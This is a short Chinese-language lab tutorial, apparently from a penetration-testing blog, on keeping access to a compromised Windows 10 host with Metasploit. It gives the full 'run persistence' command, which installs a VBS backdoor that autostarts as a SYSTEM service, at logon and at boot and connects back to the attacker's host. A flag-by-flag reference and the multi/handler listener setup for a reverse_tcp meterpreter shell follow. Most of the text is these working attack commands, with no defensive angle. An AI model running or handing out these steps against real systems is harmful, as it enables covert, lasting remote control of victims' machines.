环境说明
| IP | HOSTNAME | NOTE |
|---|
| 172.16.106.67 | Kali Linux | 攻击者主机 |
| 10.10.10.88 | Windows 10 | 受害者主机 |
首先拿到受害者主机权限

- 如图所示可以看到攻击者主机
172.16.106.67获取到了10.10.10.88受害者主机的控制权限。
使用msf persistence模块创建后门
run persistence -S -U -X -i 5 -p 2334 -r 172.16.106.67
# 参数详解:
-A 自动启动匹配的exploit/multi/handler 连接到代理
-L <opt> 目标主机中要写入有效负载的位置,如果没有,将使用 %TEMP%。
-P <opt> 要使用的有效负载,默认为 windows/meterpreter/reverse_tcp。
-S 在启动时自动启动代理作为服务(具有 SYSTEM 权限)
-T <opt> 要使用的备用可执行模板
-U 用户登录时自动启动代理
-X 系统启动时自动启动代理
-h 帮助菜单
-i <opt> 每次连接尝试之间的时间间隔(以秒为单位)
-p <opt> 运行 Metasploit 的系统正在监听的端口
-r <opt> 运行 Metasploit 的系统的 IP 监听连接

- 如下图可以看到vbs脚本已在windows受害者主机上创建

攻击机开启监听
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 172.16.106.67
set lport 2334
exploit
